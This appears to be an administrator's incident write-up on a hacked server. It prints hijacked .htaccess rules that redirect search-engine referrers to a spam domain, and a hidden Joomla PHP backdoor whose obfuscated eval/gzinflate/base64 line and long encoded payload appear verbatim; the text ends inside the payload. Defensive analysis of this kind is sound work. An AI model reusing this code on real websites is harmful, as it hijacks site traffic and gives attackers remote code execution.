During the weekly maintenance of the Windows server of one of our clients, after having been reported that
searching for the website on Google returns strange Russian websites
andmy antivirus is raising some warning when I visit the website
, I noticed something was strange while adjusting Apache's configuration for efficiency: the.htaccessfiles contained strange modifications that did not look like coming from me or my team. I realized that the.htaccesswere hijacked for the purpose of redirecting referral traffic to spam websites. Here is the content of the file (scroll right to see the cream):- <IfModule mod_rewrite.c>
- RewriteEngine On
- RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace)\.(.*)
- RewriteRule ^(.*)$ http://deafmassachusetts.info/Conference?8 [R=301,L]
- RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
- RewriteRule ^(.*)$ http://deafmassachusetts.info/Conference?8 [R=301,L]
- </IfModule>
- ErrorDocument 500 http://deafmassachusetts.info/Conference?8
As you can see, the hacker tried very hard to hide the malicious lines, by either adding a lot of empty lines or blank characters before the actual annoyance.
It should be noted a few things about this issue. First, all .htaccess under the
DocumentRootof the server were modified. If an.htaccessfile did not initially exist, it was created. If it did exist, it was altered with lines similar as the ones above. In both cases, the file was also set to read-only to prevent lower privileged users to clean it.Although cleaning the files was trivial, it took us a little bit more time to determine how they could have been modified in the first place. A thorough inspection of the logs finally revealed that one of the Joomla! websites hosted on the machine was hit by strange activity: namely, many POST requests to a hidden PHP script in an images folder. Well, the file was not exactly hidden since we are talking of a Windows server. In our case, the file was called
.cache_nfl5jf.php, although this name has probably been generated randomly.I fired my text editor to inspect the content of this file and learn yet another base64-encoded song. On the first observation, it looked like many other Joomla! PHP scripts, starting with some copyright comments, defining a class starting by J, etc... However, the first hint that made me think that the file was note legitimate was that the lack of:
Although the prolog comment was actually here:
- // no direct access
The file was indeed directly accessible as an entry point, and the logs proved that it was actually accessed abusively. Regarding the
eval(), it was near the end of the file, after the class definition, but cleverly hidden. Look for yourself:- preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28'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